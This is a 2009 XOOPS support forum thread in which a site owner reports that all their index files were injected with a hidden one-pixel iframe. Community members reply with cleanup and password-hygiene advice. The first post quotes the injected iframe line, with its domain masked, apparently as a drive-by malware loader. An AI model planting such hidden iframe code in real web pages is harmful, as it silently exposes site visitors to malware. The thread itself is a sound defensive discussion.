1
lamis_nador
I need a help PLZ :every file named index has been injected ...
  • 2009/1/11 21:48

  • lamis_nador

  • Just popping in

  • Posts: 1

  • Since: 2009/1/11


Hello,

I need a help plz,so I checked my domain today and found an error on my index.php page. When I checked the page I found that a code has been injected. Here is the code:

<iframe src="http://xxxx.cn/in.cgi?cocacola3" width=1 height=1 style="visibility: hidden"></iframe>

[EDIT by Mamba]I've replaced the domain name of the hacker, as Ghia suggested

I checked the rest of my domain and found out that every file named index has been injected with the same code, so all my index.php and index.html have been changed.

how can I remode this virus from my XOOPS site :(

2
ghia
Re: I need a help PLZ :every file named index has been injected ...
  • 2009/1/11 22:27

  • ghia

  • Community Support Member

  • Posts: 4953

  • Since: 2008/7/3 1


Your site has been hacked. This can be due to a security failure of XOOPS, on your PC or of your hosters server. Contact your hoster for the last case.

It is important to find out how the hacker managed to get access. Check out your logs. Delete the files on your site and replace them from a recent backup. Update your site to recent and stable versions. Inspect your database for sneaky data. Change all your passwords and check all the users that manage the site on all levels (MySQL, FTP XOOPS webmasters and privileged groups). Read the advices given in some threads about hacked sites (follow show all) and the security News.

PS: Don't publish SPAM domains!

3
stefan88
Re: I need a help PLZ :every file named index has been injected ...
  • 2009/1/11 22:34

  • stefan88

  • Community Support Member

  • Posts: 1085

  • Since: 2004/9/20


Hi,

on top of what ghia said you may post a list of used modules with versions and get some info on security treats and problems...

clear the template cache and check webmaster group for new members...
..

4
tank1955
Re: I need a help PLZ :every file named index has been injected ...
  • 2009/1/11 23:00

  • tank1955

  • Module Developer

  • Posts: 276

  • Since: 2007/9/7 1


The exact same thing happened to me several months ago. The hacker managed to access and get a dump of my username and password list for the site. The password I was using to administer the site was the same password I used to access ftp.

I would suggest either looking at your server's ftp log or ask your host provider to look at the log. Even if you have to keep a hand written list of passwords I recommend never using the same password twice.

And when it comes to beefing up security for the future you should follow the advice of folks like ghia. He was fantastic at helping me work through my issues.

5
Mamba
Re: I need a help PLZ :every file named index has been injected ...
  • 2009/1/12 0:38

  • Mamba

  • Moderator

  • Posts: 11250

  • Since: 2004/4/23


Quote:
Even if you have to keep a hand written list of passwords I recommend never using the same password twice.

Absolutely agree! And with tools like http://keepass.info/ that generate and keep passwords for you, there is really no excuse for not doing it.

Quote:
And when it comes to beefing up security for the future you should follow the advice of folks like ghia. He was fantastic at helping me work through my issues.

Yep, Ghia is D'Man!!! As a community we're so lucky to have him!!!
Support XOOPS => DONATE
Use 2.5.10 | Docs | Modules | Bugs

Login

Username:
Password:

Lost Password? Register now!

Who's Online

33 user(s) are online (9 user(s) are browsing Support Forums)


Members: 0


Guests: 33


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Jun 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits